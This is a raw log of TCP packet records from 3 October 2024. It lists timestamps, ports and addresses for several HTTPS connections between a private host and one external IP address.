                                                                                                                                                      Oct 3, 2024 09:16:18.542107105 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.542129040 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.542174101 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.542922020 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.542936087 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.542984962 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.542990923 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.543034077 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.561472893 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.561492920 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.561664104 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.561680079 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.561724901 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.571824074 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.571844101 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.571927071 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.571947098 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.571985006 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.588202000 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.588279963 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.588443041 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.588505030 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.588527918 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.588561058 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.595109940 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.595165014 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.595267057 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.595287085 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.595304012 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.595335960 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.596358061 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.596419096 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.596457958 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.596472025 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.596489906 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.596538067 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.604568958 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.604626894 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.604707956 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.604763031 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.604782104 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.604815960 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.628890038 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.628911972 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.629024982 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.629077911 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.629134893 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.631355047 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.631371021 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.631437063 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.631445885 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.631489038 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.651921034 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.651937962 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.652062893 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.652077913 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.652120113 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.660984039 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.661020041 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.661155939 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.661170959 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.661353111 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.678049088 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.678080082 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.678253889 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.678281069 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.678335905 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.683801889 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.683856964 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.683907986 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.683917999 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.684087038 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.684087038 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.684650898 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.684693098 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.684729099 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.684742928 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.684773922 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.684796095 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.691338062 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.691356897 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.691560984 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.691574097 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.691617966 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.715926886 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.715945005 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.716042995 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.716054916 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.716099024 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.718575001 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.718590021 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.718650103 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.718657970 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.718705893 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.742258072 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.742271900 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.742391109 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.742403984 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.742448092 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.748042107 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.748058081 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.748136044 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.748146057 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.748189926 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.765016079 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.765037060 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.765250921 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.765275955 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.765325069 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.770672083 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.770685911 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.770752907 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.770761967 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.770798922 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.771683931 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.771697998 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.771756887 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.771764040 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.771802902 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.778345108 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.778359890 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.778423071 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.778429985 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.778470993 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.802403927 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.802427053 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.802522898 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.802535057 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.802577972 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.805310965 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.805325985 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.805397987 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.805404902 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.805444956 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.829298973 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.829313993 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.829464912 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.829478025 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.829523087 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.834996939 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.835011005 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.835050106 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.835058928 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.835097075 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.835114956 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.852094889 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.852109909 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.852220058 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.852230072 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.852267981 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.857494116 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.857507944 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.857583046 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.857589960 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.857624054 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.858659029 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.858673096 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.858716011 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.858721972 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.858750105 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.858767033 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.865262985 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.865278006 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.865336895 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.865344048 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.865411043 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.889355898 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.889374971 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.889559984 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.889590979 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.889632940 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.892103910 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.892119884 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.892199993 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.892208099 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.892251968 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.916264057 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.916280985 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.916337013 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.916349888 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.916383028 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.921777010 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.921796083 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.921868086 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.921876907 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.921901941 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.921919107 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.939506054 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.939522028 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.939594030 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.939603090 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.939640999 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.944760084 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.944776058 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.944824934 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.944833040 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.944869041 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.945983887 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.945998907 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.946053028 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.946058989 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.946099997 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.952357054 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.952372074 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.952455997 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.952461958 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.952501059 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.976619005 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.976644993 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.976694107 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.976725101 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.976737976 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.976763964 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.979516029 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.979533911 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.979595900 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.979604006 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.979640007 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:19.003770113 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:19.003786087 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:19.003808022 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:19.003866911 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:19.003907919 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:19.003928900 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:19.003947020 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:19.003952980 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:19.003989935 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:19.003993034 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:19.004031897 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:19.004304886 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:19.004322052 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:19.054795980 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:19.054850101 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:19.054944992 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:19.055202961 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:19.055221081 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:19.707928896 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:19.708106041 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:19.715154886 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:19.715186119 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:19.732500076 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:19.732532024 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:19.732563019 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:19.732574940 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:20.127938032 CEST49729443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:20.127983093 CEST4434972949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:20.128061056 CEST49729443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:20.128324032 CEST49729443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:20.128336906 CEST4434972949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:20.579875946 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:20.579968929 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:20.579999924 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:20.580032110 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:20.581274033 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:20.581300020 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:20.784451962 CEST4434972949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:20.784635067 CEST49729443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:20.785211086 CEST49729443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:20.785223007 CEST4434972949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:20.787199020 CEST49729443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:20.787204981 CEST4434972949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:21.242271900 CEST49730443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:21.242317915 CEST4434973049.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:21.242386103 CEST49730443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:21.242635012 CEST49730443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:21.242646933 CEST4434973049.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:21.822153091 CEST4434972949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:21.822237015 CEST4434972949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:21.822237968 CEST49729443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:21.822293997 CEST49729443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:21.823324919 CEST49729443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:21.823345900 CEST4434972949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:21.921328068 CEST4434973049.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:21.921443939 CEST49730443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:21.921998024 CEST49730443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:21.922014952 CEST4434973049.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:21.923886061 CEST49730443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:21.923898935 CEST4434973049.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:22.500623941 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:22.500679970 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:22.501002073 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:22.501353025 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:22.501373053 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:22.773066998 CEST4434973049.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:22.773153067 CEST4434973049.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:22.773205042 CEST49730443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:22.773251057 CEST49730443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:22.774348021 CEST49730443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:22.774367094 CEST4434973049.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.148775101 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.148931980 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.149552107 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.149568081 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.151634932 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:23.151650906 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:23.575947046 CEST4434973149.12.197.9192.168.2.6
